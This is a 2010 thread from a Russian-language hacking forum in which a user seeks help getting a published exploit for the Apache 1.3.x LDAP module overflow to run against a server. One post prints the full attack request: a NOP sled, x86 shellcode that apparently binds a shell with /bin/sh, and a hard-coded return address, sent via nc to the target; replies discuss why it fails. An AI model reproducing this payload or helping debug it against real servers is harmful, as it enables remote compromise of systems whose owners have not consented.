HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Apche <1.3.37 exploit
  #1  
Старый 02.04.2010, 15:35
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
Провел на форуме:
17783

Репутация: 1
По умолчанию Apche <1.3.37 exploit

Помогите разобраться с эксплойтом - http://milw0rm.com/exploits/2237
Пытаюсь его запустить но сервер в ответ пишет
HTTP/1.1 400 Bad Request

Я так понимаю в этой строке:
Код:
echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
закралась лишняя кавычка, но вот какая именно не уловлю.
 
Ответить с цитированием

  #2  
Старый 02.04.2010, 15:57
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

попробуй убрать кавычку возле гет
 
Ответить с цитированием

  #3  
Старый 02.04.2010, 16:07
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
Провел на форуме:
17783

Репутация: 1
По умолчанию

Не помогло.
Код:
echo -ne my_string_for_print
работает так же как и
Код:
echo -ne "my_string_for_print"
 
Ответить с цитированием

  #4  
Старый 02.04.2010, 17:16
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
Провел на форуме:
17783

Репутация: 1
По умолчанию

Код:
echo -ne "GET /kung/ldap://localhost/%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\
%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80
Такая штука тоже не работает. Даже с удалёнными CCCCCCCCCC....
пробовал так:

Код:
nc <host> <port>
<тут мессага хосту>
Если в месседже после GET <uri> есть пробел, то сразу выбрасывается <TITLE>400 Bad Request</TITLE>
Как же тогда выполнить экспойт с его
Код:
HTTP/1.1\r\n\ Host: $host\r\n\r\n
Что вообще ЭТО делает
 
Ответить с цитированием

  #5  
Старый 04.04.2010, 19:23
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

Цитата:
HTTP/1.1\r\n\ Host: $host\r\n\r\n
Что вообще ЭТО делает
Это сетевая этика. Чтобы клиент и сервер понимали друг друга и не было путаницы, было введено использовать возврат каретки и переход на новую строку.

ldap обработчик в апаче по дефолту, вроде, отключен, поэтому не вызывается уязвимая функция.

Если бы даже он был включен, вероятность выполнения это эксплойта была бы ничтожна мала, т.к. адрес возврата задан для определенной ОС(в данном случае debian). Так что, тебе придется сначала найти эту уязвимость, проэксплуатировать, написать версии для разных ОС и только потом уже использовать =) enjoy
 
Ответить с цитированием

  #6  
Старый 05.04.2010, 17:18
invis87
Новичок
Регистрация: 09.04.2008
Сообщений: 5
Провел на форуме:
17783

Репутация: 1
По умолчанию

спасибо
 
Ответить с цитированием

  #7  
Старый 07.06.2010, 15:59
Migel
Новичок
Регистрация: 06.06.2010
Сообщений: 23
Провел на форуме:
21402

Репутация: 5
По умолчанию

Цитата:
Если бы даже он был включен, вероятность выполнения это эксплойта была бы ничтожна мала, т.к. адрес возврата задан для определенной ОС(в данном случае debian).
Я не понимаю при чем здесь ОС? Разьве Apache для разных линухов отличаются?
 
Ответить с цитированием

  #8  
Старый 07.06.2010, 17:23
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

Apache - нет,а адрес возварата везде разный
 
Ответить с цитированием

  #9  
Старый 07.06.2010, 17:39
Migel
Новичок
Регистрация: 06.06.2010
Сообщений: 23
Провел на форуме:
21402

Репутация: 5
По умолчанию

Цитата:
адрес возварата везде разный
Я не силен в программировании, но зачем нужен адрес возврата для DoS експлойта? Записать в память кашу можно и не зная его...
 
Ответить с цитированием

  #10  
Старый 07.06.2010, 17:47
Migel
Новичок
Регистрация: 06.06.2010
Сообщений: 23
Провел на форуме:
21402

Репутация: 5
По умолчанию

И еще - разве такие вещи не зависят от ядра? Т.е. ясное дело, что такой сплойт не подойдет к соляре, но разьве он не будет работать скажем на ВСЕХ линухах с одинаковым ядром?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Mozilla Firefox 3.5.3 Local Download Manager Exploit Isis Уязвимости 0 31.10.2009 04:00
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Уязвимости CMS / форумов 21 13.01.2007 23:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ